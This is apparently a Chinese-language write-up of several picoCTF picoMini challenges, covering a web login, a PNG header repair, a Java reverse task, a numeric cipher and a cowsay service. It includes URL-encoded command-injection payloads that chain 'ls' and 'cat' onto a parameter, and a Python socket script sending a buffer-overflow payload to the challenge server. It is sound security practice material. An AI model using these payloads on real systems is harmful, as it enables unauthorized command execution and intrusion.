CTF题目 July. 5th 2021

[Easy] [Web] login

My dog-sitter’s brother made this website but I can’t get in; can you help?

login.mars.picoctf.net

开发人员工具-网络中找到index.js,里面有密码Base64编码后的密文,解密即为flag。

[Easy] [Forensics] advanced-potion-making

Ron just found his own copy of advanced potion making, but its been corrupted by some kind of spell. Help him recover it!

https://artifacts.picoctf.net/picoMini+by+redpwn/Forensics/advanced-potion-making/advanced-potion-making

下载下来一个文件:advanced-potion-making

打开看二进制,PNG很像。那就把前面改成:

89 50 4E 47 0D 0A 1A 0A 00 00 00 0D

然后改后缀为.png,用stegsolve打开,得到flag。

P.S. 要注意‘i’和‘1’,‘j’和‘d’,‘v’和‘r’。

[Easy] [Reverse] vault-door-training

Your mission is to enter Dr. Evil’s laboratory and retrieve the blueprints for his Doomsday Project. The laboratory is protected by a series of locked vault doors. Each door is controlled by a computer and requires a password to open. Unfortunately, our undercover agents have not been able to obtain the secret passwords for the vault doors, but one of our junior agents obtained the source code for each vault’s computer! You will need to read the source code for each level to figure out what the password is for that vault door. As a warmup, we have created a replica vault in our training facility. The source code for the training vault is here: VaultDoorTraining.java

Hint: The password is revealed in the program’s source code.

下载下来一个.java文件:VaultDoorTraining.java

打开即可看见flag。

[Easy] [Crypto] The Numbers

The numbers… what do they mean?

Hint: The flag is in the format PICOCTF{}

下载下来一个图片:the_numbers.png

打开是一些数字和一对大括号,直接猜凯撒密码。

flag开头是picoCTF,那就用ascii码相减看下相差多少,然后每个数字都加上差值后按ascii码转成字符即可。

[Easy] [Web] caas

Now presenting cowsay as a service

https://artifacts.picoctf.net/picoMini+by+redpwn/Web+Exploitation/caas/index.js

Hint: Tomorrow I’m going to teach my cow to say Mooo...;moo!

下载下来一个.js文件:index.js

提示是picoCTF本来没有的,帮大忙了。

可以发现页面没返回正确结果。

猜测题目的做法是直接把/usr/games/cowsay ${req.params.message}中的${req.params.message}替换成传的message然后直接运行。

123%20&&%20ls试一试,输出了当前目录下文件,里面有个falg.txt。

然后传123%20&&%20cat%20falg.txt拿到flag。

[Medium] [Web] notepad

This note-taking site seems a bit off.

notepad.mars.picoctf.net

https://artifacts.picoctf.net/picoMini+by+redpwn/Web+Exploitation/notepad/notepad.tar

下载下来一个.tar文件:notepad.tar

// TODO

[Medium] [Binary] clutter-overflow

Clutter, clutter everywhere and not a byte to use.

nc mars.picoctf.net 31890

https://artifacts.picoctf.net/picoMini+by+redpwn/Binary+Exploitation/clutter-overflow/chall.c

https://artifacts.picoctf.net/picoMini+by+redpwn/Binary+Exploitation/clutter-overflow/chall

下载下来两个文件:chall.cchall

查看chall.c可以看见是缓冲区溢出漏洞。

运行下面这段代码,不断地去试b'\xef\xbe\xad\xde' * 0x43后乘上的数字是多少,试出结果。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
import socket


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect(('mars.picoctf.net', 31890))
    data = s.recv(1024)
    data = s.recv(1024)

    s.sendall(b'\xef\xbe\xad\xde' * 0x43 + b'\n')

    data = s.recv(1024)
    print(data)
    data = s.recv(1024)
    print(data)
except Exception as e:
    print(e)
finally:
    s.close()